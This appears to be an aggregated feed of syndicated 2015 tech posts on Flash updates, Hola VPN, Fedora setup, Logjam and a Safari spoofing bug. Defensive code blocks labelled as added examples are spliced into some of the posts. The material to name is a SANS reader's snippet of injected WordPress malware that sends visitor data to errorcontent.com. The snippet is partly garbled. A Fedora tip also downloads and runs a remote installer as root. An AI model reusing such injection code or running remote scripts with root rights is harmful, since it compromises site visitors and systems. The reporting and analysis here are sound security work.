If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Users of the Adobe Flash Player Desktop Runtime for Windows and Macintosh should update to Adobe Flash Player 18.0.0.160. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to version 18.0.0.160, although Chrome users on Mac systems will find 18.0.0.161 is actually the latest version, according to Adobe. To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google Chrome”, click the apply update button and restart the browser.


The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). See this graphic for the full Adobe version release.

Most applications bundled with Adobe AIR should check for updates on startup. If prompted, please download and install the AIR update. If you need to update manually, grab the latest version here.

As usual, please sound off in the comments section if you experience any issues applying any of these patches.

TorrentFreak: Hola VPN Already Exploited By “Bad Guys”, Security Firm Says

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

After a flurry of reports, last week the people behind geo-unblocking software Hola were forced to concede that their users’ bandwidth is being sold elsewhere for commercial purposes. But for the Israel-based company, that was the tip of the iceberg.

Following an initial unproven report that the software operates as a botnet, this weekend researchers published an advisory confirming serious problems with the tool.

“The Hola Unblocker Windows client, Firefox addon, Chrome extension and Android application contain multiple vulnerabilities which allow a remote or local attacker to gain code execution and potentially escalate privileges on a user’s system,” the advisory reads.

Yesterday and after several days of intense pressure, Hola published a response in which it quoted Steve Jobs and admitted that mistakes had been made. Hola said that it would now be making it “completely clear” to its users that their resources are being used elsewhere in exchange for a free product.

Hola also confirmed that two vulnerabilities found by the researchers at Adios-Hola had now been fixed, but the researchers quickly fired back.

“We know this to be false,” they wrote in an update. “The vulnerabilities are *still* there, they just broke our vulnerability checker and exploit demonstration. Not only that; there weren’t two vulnerabilities, there were six.”

With Hola saying it now intends to put things right (it says it has committed to an external audit with “one of the big 4 auditing companies”) the company stood by its claims that its software does not turn users’ computers into a botnet. Today, however, an analysis by cybersecurity firm Vectra is painting Hola in an even more unfavorable light.

In its report Vectra not only insists that Hola behaves like a botnet, but it’s possible it has malicious features by design.

“While analyzing Hola, Vectra Threat Labs researchers found that in addition to behaving like a botnet, Hola contains a variety of capabilities that almost appear to be designed to enable a targeted, human-driven cyber attack on the network in which an Hola user’s machine resides,” the company writes.

“First, the Hola software can download and install any additional software without the user’s knowledge. This is because in addition to being signed with a valid code-signing certificate, once Hola has been installed, the software installs its own code-signing certificate on the user’s system.”

If the implications of that aren’t entirely clear, Vectra assists on that front too. On Windows machines, the certificate is added to the Trusted Publishers Certificate Store which allows *any code* to be installed and run with no notification given to the user. That is frightening.
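A defender-side check for the Trusted Publishers issue just described, added here as an example and not taken from the TorrentFreak article or Vectra’s report: it lists every certificate in the machine and user Trusted Publishers stores that is not on an allowlist you supply, so an unexpected or self-signed publisher stands out. The thumbprint allowlist is a placeholder to be filled with your own approved values.

```powershell
# Added example (not from the article or Vectra's report): enumerate the
# Trusted Publishers certificate stores and report entries that are not on
# a known allowlist. $ExpectedThumbprints is a placeholder you populate with
# the thumbprints of publishers your organisation has deliberately trusted.
function Get-UnexpectedTrustedPublisher {
    [CmdletBinding()]
    param(
        [string[]]$ExpectedThumbprints = @()
    )

    # Both the machine-wide and the per-user store can grant publisher trust.
    $stores = @(
        'Cert:\LocalMachine\TrustedPublisher',
        'Cert:\CurrentUser\TrustedPublisher'
    )

    foreach ($store in $stores) {
        if (-not (Test-Path -Path $store)) { continue }

        Get-ChildItem -Path $store | ForEach-Object {
            $cert = $_
            [PSCustomObject]@{
                Store      = $store
                Subject    = $cert.Subject
                Issuer     = $cert.Issuer
                Thumbprint = $cert.Thumbprint
                NotAfter   = $cert.NotAfter
                # A self-signed entry (subject equals issuer) was not issued by a
                # public CA and deserves a closer look.
                SelfSigned = ($cert.Subject -eq $cert.Issuer)
                Expected   = ($ExpectedThumbprints -contains $cert.Thumbprint)
            }
        } | Where-Object { -not $_.Expected }
    }
}

# Usage: show every entry not on the allowlist, self-signed ones first.
# Replace the placeholder thumbprint with your own approved values.
Get-UnexpectedTrustedPublisher -ExpectedThumbprints @('<APPROVED-THUMBPRINT-PLACEHOLDER>') |
    Sort-Object -Property SelfSigned -Descending |
    Format-Table Store, Subject, Thumbprint, NotAfter, SelfSigned -AutoSize
```

Run it from an elevated prompt to read the LocalMachine store; an entry you do not recognise can be inspected with `Get-ChildItem Cert:\LocalMachine\TrustedPublisher\<thumbprint> | Format-List *` before deciding whether to remove it.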

Furthermore, Vectra found that Hola contains a built-in console (“zconsole”) that is not only constantly active but also has powerful functions including the ability to kill running processes, download a file and run it whilst bypassing anti-virus software, plus read and write content to any IP address or device.

“These capabilities enable a competent attacker to accomplish almost anything. This shifts the discussion away from a leaky and unscrupulous anonymity network, and instead forces us to acknowledge the possibility that an attacker could easily use Hola as a platform to launch a targeted attack within any network containing the Hola software,” Vectra says.

Finally, Vectra says that while analyzing the protocol used by Hola, its researchers found five different malware samples on VirusTotal that contain the Hola protocol. Worryingly, they existed before the recent bad press.

“Unsurprisingly, this means that bad guys had realized the potential of Hola before the recent flurry of public reports by the good guys,” the company adds.

For now, Hola is making a big show of the updates being made to its FAQ as part of its efforts to be more transparent. However, items in the FAQ are still phrased in a manner that portrays criticized elements of the service as positive features, something that is likely to mislead non-tech oriented users.

“Since [Hola] uses real peers to route your traffic and not proxy servers, it makes you more anonymous and more secure than regular VPN services,” one item reads.

How Hola will respond to Vectra’s latest analysis remains to be seen, but at this point there appears little that the company can say or do to pacify much of the hardcore tech community. That being said, if Joe Public still can’t see the harm in a free “community” VPN operating a commercial division with full access to his computer, Hola might settle for that.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Linux How-Tos and Linux Tutorials: 11 Things to do After Installing Fedora 22

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

Fedora 22 is certainly an exciting release for the hard core Fedora fans. And it has more than enough glitter to attract a potential new user.

One of the most notable improvements includes the arrival of DNF which replaces the aging Yum. In my own experience DNF is faster and more memory efficient than Yum. It looks like we have an answer to apt-get in Fedora land.

Since Fedora is primarily a Gnome distro, you will notice the brand new and shiny Gnome 3.16. There are massive improvements in Gnome 3.16 including the brand new notification system, the improved Nautilus (Files) and image viewer which removes all the chrome to focus on the image itself.

One of the most exciting tools in Fedora is the introduction of Vagrant which helps developers in getting started with virtualized environments quickly and easily.

As usual it’s a polished release of the distro with a lot of new features which we will cover in a detailed review next week.

Every operating system whether it be Mac OS X, Windows or Fedora needs some work to customize to serve its user. However, unlike its proprietary counterparts, Fedora comes with quite a lot of software pre-installed so you won’t have to do that much work.

Here are some of the things that I do after installing Fedora on a system. None of it is mandatory and most of it is targeted to an average user. You will be able to use Fedora without doing any of it, but these tips can help improve your experience with the distro. So without further ado let’s get started.

Update your system

First of all we need to update the system. A lot of packages will have received updates between the release and the time you installed Fedora on your system. To ensure your system is safe and secure you must keep your system up-to-date. With Fedora 22, ‘yum’ is on its way out and ‘dnf’ is replacing it, so we will be using ‘dnf’ instead of ‘yum’ to perform many tasks.

To install updates on your system run the following command:

sudo dnf update

Install extra repositories

As is widely known, many Linux distributions can’t ship a variety of packages through official repositories due to licences and patents. On a Fedora system you can get access to such packages by installing the RPM Fusion repositories.

You have to install two repositories – Free and Non-free. It’s extremely simple to add these repositories to your system; just open the RPM Fusion website. There you will find links for different versions of Fedora. Click on the link for your version of Fedora and it will install that repo on your system through the ‘Software’ app. It’s recommended to first install the ‘Free’ repo and then the ‘Non-Free’ one.


Once these two repos are installed we now have access to many more applications.

Install VLC Media Player

VLC is the Swiss Army knife of media players. It can play virtually every media format out there. Since the RPMFusion repos are already installed you can install VLC using ‘dnf’:

sudo dnf install vlc

Install Clementine

As much as I like Gnome, the default desktop environment of Fedora, I am not a huge fan of the painfully simple Rhythmbox. I always install the ‘Clementine’ music player which not only has a nicer interface, but also comes with more features. You can install Clementine by running:

sudo dnf install clementine

Install MP3 codecs

Fedora’s focus on FOSS-only software packages does make it more challenging to get stuff like mp3 files to work. I used to install gstreamer plugins for mp3 support, but I faced some problems in Fedora 22. So I resorted to another nifty tool called Fedy. Since Fedy does more than installing codecs, I will talk about it separately.

Get Fedy, before you get fed-up

Fedy is a ‘jack of all trades’ kind of tool. Install Fedy using the following command:

su -c "curl https://satya164.github.io/fedy/fedy-installer -o fedy-installer && chmod +x fedy-installer && ./fedy-installer"

Once installed, you will see there are broadly two kinds of tasks you can perform using Fedy: install new packages and tweak the system. Under the ‘Apps’ tab you will find the option to install ‘multimedia codecs’ which will also bring ‘mp3’ support to your system.

Just scroll through it and see what else you want to install. Two of my favorite packages, in addition to codecs, are Microsoft fonts (for better font rendering) and Sublime Text.


There are chances that a font may look ugly in Fedora. This problem isn’t unique to Fedora; I have the same issue with Arch Linux, openSUSE or Kubuntu as well. I spend a considerable amount of time fixing fonts on these systems. Fedy has made it extremely easy to make fonts look good under Fedora with just one click. Under ‘Tweaks’ one of the most important options is ‘font rendering’, which will fix font issues on your system.

Install Gnome Tweak Tool

Gnome is the default desktop environment of Fedora and the overall Gnome experience relies heavily on extensions. And Gnome Tweak Tool is an important tool to get a pristine Gnome experience. It’s surprising to see that Tweak Tool doesn’t come pre-installed on Fedora. Comparatively openSUSE does a better job by pre-installing Tweak Tool and some useful extensions. You can install Tweak Tool in Fedora by running this command:

sudo dnf install gnome-tweak-tool

Once the tool is installed, you can manage your extensions from there. I wish the tool was able to search and install new extensions too. Currently you have to visit the Gnome Extensions site to install new extensions. Once the extension is installed, you can enable it, configure it and disable it from the Tweak Tool.

Since I have a multi-monitor set-up I grab the extension for Multiple Monitors. I also recommend ‘Dash to Dock’ which allows a user to configure the Dash. You can disable Dash from ‘autohiding’, you can change the icon size, you can even choose the location of the dash. Last, but not least, you can also extend the dash to the length of the screen just like the one in Unity. For the users of multiple monitors, there is a nifty option to show the dash on the desired monitor. It’s a must-have extension.

Install Chrome to watch Netflix

Fedora tends to offer the vanilla Gnome experience, but instead of Web, the default web browser of Gnome, it comes with Firefox. However Firefox still doesn’t support DRMed content on Linux so you can’t watch Netflix. That’s where Google Chrome comes in handy. You can install Chrome by either downloading it from the Google site or from Fedy.

Download and install Chrome from the official site.

Cloud in your hands

If you are running your own private cloud — and you must in order to safeguard any sensitive data — you can grab the clients for Seafile or ownCloud for your system. But if you use Google Drive or Dropbox you can also use them easily on Fedora.

There are official clients for all commercial cloud services including Dropbox, with Google Drive being an exception. One of the easiest ways to get Google Drive on Linux is inSync; while it does have more features than the Google Drive client, it costs money to use. You can install inSync by downloading the official client from their website. Once installed, connect it to your Google account, point it to the location where you want your files to be saved, and you are good to take Google for a drive.

Online accounts

Despite being a Plasma user I envy the Online Accounts feature of Gnome. It makes it extremely easy to configure communication tools such as email, calendars, address book and IM.

Gnome’s Online Accounts supports more than half a dozen services including Google, Facebook, Flickr, ownCloud, etc. Open Online Accounts from the Dash and choose the service you want to configure. Once you are connected to an account, you can choose what kind of service you want to enable for that account. In case of Google, for example, I enabled all these services.


The beauty is that when I open Evolution, the default email client in Fedora, it’s already configured with that email account.

Getting non-free drivers for GPU

It’s really hard to get non-free software to work with Fedora. I use Arch Linux and I find it much easier to install Nvidia drivers on Arch than it is on Fedora. The fact is you will not need non-free drivers under Fedora as your graphics card will work out-of-the-box. However if you do need them (why would you buy an expensive Nvidia card if you can’t take full advantage of it?) then you have to do some hard work. I broke my previous Fedora installs due to non-free drivers so I gave up on them. If you want to install such drivers on the Fedora box I would suggest this RPMFusion page. My free advice to you would be, don’t try it at home.

Getting your printer to work in Fedora

It’s a non-issue nowadays, depending on the make of your printer. In most cases when you run the Printer’s tool, Fedora will detect and configure your printer with one click.

That’s most of what I do on my Fedora system. A few things, mostly related to non-free software, do look more complicated under Fedora. That’s mainly due to Fedora’s policy to use and promote FOSS. Once you cross that river Fedora is a pleasant OS to use.

Now tell us what things you do after installing Fedora on your system.

TorrentFreak: Hola VPN Sells Users’ Bandwidth, Founder Confirms

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Faced with increasing local website censorship and Internet services that restrict access depending on where a user is based, more and more people are turning to specialist services designed to overcome such limitations.

With prices plummeting to just a few dollars a month in recent years, VPNs are now within the budgets of most people. However, there are always those who prefer to get such services for free, without giving much consideration to how that might be economically viable.

One of the most popular free VPN/geo-unblocking solutions on the planet is operated by Israel-based Hola. It can be added to most popular browsers in seconds and has an impressive seven million users on Chrome alone. Overall the company boasts 46 million users of its service.

Now, however, the company is facing accusations from 8chan message board operator Fredrick Brennan. He claims that Hola users’ computers were used to attack his website without their knowledge, and that this was made possible by the way Hola is set up.

“When a user installs Hola, he becomes a VPN endpoint, and other users of the Hola network may exit through his internet connection and take on his IP. This is what makes it free: Hola does not pay for the bandwidth that its VPN uses at all, and there is no user opt out for this,” Brennan says.

This means that rather than having their IP addresses cloaked behind a private server, free Hola users are regularly exposing their IP addresses to the world but associated with other people’s traffic – no matter what that might contain.


While this will come as a surprise to many, Hola says it has never tried to hide the methods it employs to offer a free service.

Speaking with TorrentFreak, Hola founder Ofer Vilenski says that his company offers two tiers of service – the free option (which sees traffic routed between Hola users) and a premium service, which operates like a traditional VPN.

However, Brennan says that Hola goes a step further, by selling Hola users’ bandwidth to another company.

“Hola has gotten greedy. They recently (late 2014) realized that they basically have a 9 million IP strong botnet on their hands, and they began selling access to this botnet (right now, for HTTP requests only) at https://luminati.io,” the 8chan owner says.

TorrentFreak asked Vilenski about Brennan’s claims. Again, there was no denial.

“We have always made it clear that Hola is built for the user and with the user in mind. We’ve explained the technical aspects of it in our FAQ and have always advertised in our FAQ the ability to pay for non-commercial use,” Vilenski says.

And this is how it works.

Hola generates revenue by selling a premium service to customers through its Luminati brand. The resources and bandwidth for the Luminati product are provided by Hola users’ computers when they are sitting idle. In basic terms, Hola users get their service for free as long as they’re prepared to let Hola hand their resources to Luminati for resale. Any users who don’t want this to happen can buy Hola for $5 per month.

Fair enough perhaps – but how does Luminati feature in Brennan’s problems? It appears his interest in the service was piqued after 8chan was hit by multiple denial of service attacks this week which originated from the Luminati / Hola network.

“An attacker used the Luminati network to send thousands of legitimate-looking POST requests to 8chan’s post.php in 30 seconds, representing a 100x spike over peak traffic and crashing PHP-FPM,” Brennan says.

Again, TorrentFreak asked Vilenski for his input. Again, there was no denial.

“8chan was hit with an attack from a hacker with the handle of BUI. This person then wrote about how he used the Luminati commercial VPN network to hack 8chan. He could have used any commercial VPN network, but chose to do so with ours,” Vilenski explains.

“If 8chan was harmed, then a reasonable course of action would be to obtain a court order for information and we can release the contact information of this user so that they can further pursue the damages with him.”

Vilenski says that Hola screens users of its “commercial network” (Luminati) prior to them being allowed to use it but in this case “BUI” slipped through the net. “Adjustments” have been made, Hola’s founder says.

“We have communicated directly with the founder of 8Chan to make sure that once we terminated BUI’s account they’ve had no further problems, and it seems that this is the case,” Vilenski says.

It is likely the majority of Hola’s users have no idea how the company’s business model operates, even though it is made fairly clear in its extensive FAQ/ToS. Installing a browser extension takes seconds and if it works as advertised, most people will be happy.

Whether this episode will affect Hola’s business moving forward is open to question but for those with a few dollars to spend there are plenty of options in the market. Until then, however, those looking for free options should read the small print before clicking install.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments, shown in red in the original post, for readability):

#2b8008#
/* turn off error reporting */
@ini_set('display_errors', 0); /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* only run the code if this is Chrome or IE and not a bot */

if (( preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610)))
{
# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]

$wp_mezd098610 = 'http://'.'error'.'content'.'.com/'.'content'.'/?'.'ip='.$_SERVER['REMOTE_ADDR'].'&referer='.urlencode($_SERVER['HTTP_HOST']).'&ua='
# check if we have the curl extension installed

if (function_exists('curl_init') && function_exists('curl_exec'))
# if we don't have curl, try file_get_contents, which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen'))
# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, 'r'));}}

if (substr($wp_8610mezd,1,3) === 'scr')
# The data retrieved will be echoed back to the user if it starts with the string scr.
I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is anybody able to retrieve content from errorcontent.com?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
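A triage helper for injected PHP of this kind, added here as an example (it is not ISC code and not part of the reader's submission). Injectors like the one above split the callback hostname into concatenated string fragments so a plain grep for the domain finds nothing; the helper folds adjacent single-quoted literals back together, pulls out any URLs, and counts the behavioural indicators seen above (error suppression, user-agent gating, bot filtering, a remote fetch, and echoing what was fetched). The SAMPLE_PHP input is constructed to mirror the snippet's structure; only the domain comes from the post.

```python
"""Triage helper for injected PHP (added example, not ISC code)."""
import re

# Constructed sample modelled on the snippet above. The domain is the one
# named in the post; the variable names and layout are constructed.
SAMPLE_PHP = r"""<?php
@ini_set('display_errors', 0);
$ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
  $u = 'http://'.'error'.'content'.'.com'.'/content'.'/?'.'ip='.$_SERVER['REMOTE_ADDR'];
  $d = @file_get_contents($u);
  if (substr($d, 1, 3) === 'scr') { echo $d; }
}
"""

# Two adjacent single-quoted literals joined by the PHP '.' operator.
_ADJACENT_LITERALS = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")


def fold_string_concatenations(src):
    """Join 'a'.'b' into 'ab' repeatedly until nothing changes, so a hostname
    that was split across fragments becomes a single greppable literal."""
    while True:
        new = _ADJACENT_LITERALS.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        if new == src:
            return src
        src = new


def extract_urls(src):
    """Return the distinct http(s) URLs visible after folding."""
    return sorted(set(re.findall(r"https?://[^'\"\s]+", fold_string_concatenations(src))))


# Behavioural indicators taken from the snippet above.
INDICATORS = {
    "suppresses_errors": re.compile(r"ini_set\s*\(\s*'display_errors'"),
    "gates_on_user_agent": re.compile(r"HTTP_USER_AGENT"),
    "filters_out_bots": re.compile(r"preg_match\s*\(\s*'/bot/i'"),
    "fetches_remote_content": re.compile(r"\b(curl_exec|file_get_contents|stream_get_contents)\s*\("),
    "echoes_fetched_data": re.compile(r"\becho\s+\$\w+"),
}


def triage_php(src):
    """Score one PHP source: which indicators fire, which URLs it contacts,
    and a simple verdict (three or more indicators plus a URL)."""
    folded = fold_string_concatenations(src)
    hits = [name for name, rx in INDICATORS.items() if rx.search(folded)]
    urls = extract_urls(folded)
    return {"indicators": hits, "urls": urls, "suspicious": len(hits) >= 3 and bool(urls)}


if __name__ == "__main__":
    print(triage_php(SAMPLE_PHP))
```

Run it over every .php file under the web root; the "urls" list gives the hostnames to block or resolve, and the folded source is what to keep for the write-up, since the unfolded fragments are what defeat a plain search.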


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve — the most efficient algorithm for breaking a Diffie-Hellman connection — is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.
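A small audit of DH parameters against the two points just quoted (prime size and prime reuse), added here as an example; it is not code from the Logjam researchers. It parses the PKCS#3 "DH PARAMETERS" PEM that OpenSSL writes (SEQUENCE of two INTEGERs, p and g) with a minimal DER reader, buckets the modulus size by the 512/768/1024-bit estimates above, and flags a prime whose fingerprint is on a caller-supplied list of shared, well-known primes. The inputs are constructed: Mersenne primes stand in for DH moduli (they are prime but are not real DH groups), and SHARED_PRIMES holds a constructed fingerprint where a deployment would list the real well-known groups.

```python
"""DH parameter audit (added example, not the Logjam authors' code)."""
import base64
import hashlib


def classify_dh_prime_bits(bits):
    """Bucket a DH modulus by the break estimates quoted above."""
    if bits <= 512:
        return "export-grade: breakable, this is what the Logjam downgrade lands on"
    if bits <= 768:
        return "weak: estimated breakable by an academic team"
    if bits <= 1024:
        return "weak: estimated breakable by a nation-state"
    return "ok: above the 1024-bit estimate"


def _der_len(n):
    # DER length: short form below 128, else 0x80|count followed by big-endian bytes
    if n < 0x80:
        return bytes([n])
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(lb)]) + lb


def _der_int(n):
    # Non-negative INTEGER: minimal big-endian bytes, leading 0x00 if the top bit is set
    b = n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")
    if b[0] & 0x80:
        b = b"\x00" + b
    return b"\x02" + _der_len(len(b)) + b


def _der_read(buf, pos):
    """Read one tag/length/value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def encode_dhparams_pem(p, g):
    """Build a PKCS#3 DHParameter PEM (used here to construct sample input)."""
    body = _der_int(p) + _der_int(g)
    der = b"\x30" + _der_len(len(body)) + body
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN DH PARAMETERS-----\n" + "\n".join(lines) + "\n-----END DH PARAMETERS-----\n"


def parse_dhparams_pem(pem):
    """Return (p, g) from a 'DH PARAMETERS' PEM block."""
    body = "".join(line for line in pem.splitlines() if line and not line.startswith("-----"))
    tag, seq, _ = _der_read(base64.b64decode(body), 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    tp, pb, pos = _der_read(seq, 0)
    tg, gb, _ = _der_read(seq, pos)
    if tp != 0x02 or tg != 0x02:
        raise ValueError("expected INTEGER p and g")
    return int.from_bytes(pb, "big"), int.from_bytes(gb, "big")


def prime_fingerprint(p):
    """Stable identifier for a modulus, for comparison against a list of shared primes."""
    return hashlib.sha256(p.to_bytes((p.bit_length() + 7) // 8, "big")).hexdigest()


def audit_dhparams(pem, shared_fingerprints=frozenset()):
    p, g = parse_dhparams_pem(pem)
    findings = [classify_dh_prime_bits(p.bit_length())]
    if prime_fingerprint(p) in shared_fingerprints:
        findings.append("shared prime: the number-field-sieve precomputation is amortised across every server using it")
    return {"bits": p.bit_length(), "generator": g, "findings": findings}


# Constructed inputs: Mersenne primes as stand-ins for DH moduli (prime, but not
# safe primes and not real DH groups). A deployment would fill SHARED_PRIMES with
# fingerprints of the real well-known groups instead of this constructed entry.
WEAK_PEM = encode_dhparams_pem(2**521 - 1, 2)
STRONG_PEM = encode_dhparams_pem(2**2203 - 1, 2)
SHARED_PRIMES = frozenset({prime_fingerprint(2**521 - 1)})

if __name__ == "__main__":
    print(audit_dhparams(WEAK_PEM, SHARED_PRIMES))
    print(audit_dhparams(STRONG_PEM, SHARED_PRIMES))
```

The two findings are independent: a server can have a 2048-bit modulus and still be a poor choice if that modulus is the same one everyone else ships, which is why the check fingerprints the prime rather than only measuring it.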

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”

[…]

The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation — just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

SANS Internet Storm Center, InfoCON: green: Address spoofing vulnerability in Safari Web Browser, (Mon, May 18th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A new vulnerability has appeared in the Safari web browser that allows address spoofing: an attacker can show any URL in the address bar while loading a different web page. While this proof of concept is not perfect, it could definitely be refined for use in phishing attacks very easily.

There is a proof of concept at http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari web browser:

From the same iPad using Google Chrome:

The code is very simple: the web page reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page, and so the user sees the real

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter: @manuelsantander
Web: http://manuel.santander.name
e-mail: msantand at isc dot sans dot org


Linux How-Tos and Linux Tutorials: Elementary OS Freya: Is This The Next Big Linux Distro?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Freya default desktop

I’ve tried just about every flavor of Linux available. Not a desktop interface has gone by that hasn’t, in some way, touched down before me. So when I set out to start kicking the tires of Elementary OS Freya, I assumed it was going to be just another take on the same old desktop metaphors. A variation of GNOME, a tweak of Xfce, a dash of OSX or some form of Windows, and the slightest hint of Chrome OS. What I wound up seeing didn’t disappoint on that level—it was a mixed bag of those very things. However, that mixed bag turned out to be something kind of special … something every Linux user should take notice of.

Why? Because Elementary OS Freya gets a lot of things right, including some things that other distributions have failed to bring to light. True user-friendliness.

Elementary OS Freya takes all of the known elements of a good UI, blends them together, and doesn’t toss in anything extraneous that might throw the user for a loop. The end result is a desktop interface that anyone (and I do mean anyone) can use without hiccup.

Before I dive any further into this, I must say that Freya is still in beta (and has been for quite some time). That being said, the beta release of Freya is rock solid. You can download the beta here and install it alongside your current OS or as a virtual guest in VirtualBox.

With that said, let’s examine what it is about Elementary OS Freya that makes it, quite possibly, the most ideal Linux desktop distribution (and maybe what it could use to draw it nearer to perfection).

Design

This is where Freya truly nails just about every possible aspect of the desktop interface. Upon installation (or loading up the live image), you are greeted with a minimalist interface that, at first glance, looks like a take on GNOME Shell with an added dock for good measure (Figure 1).

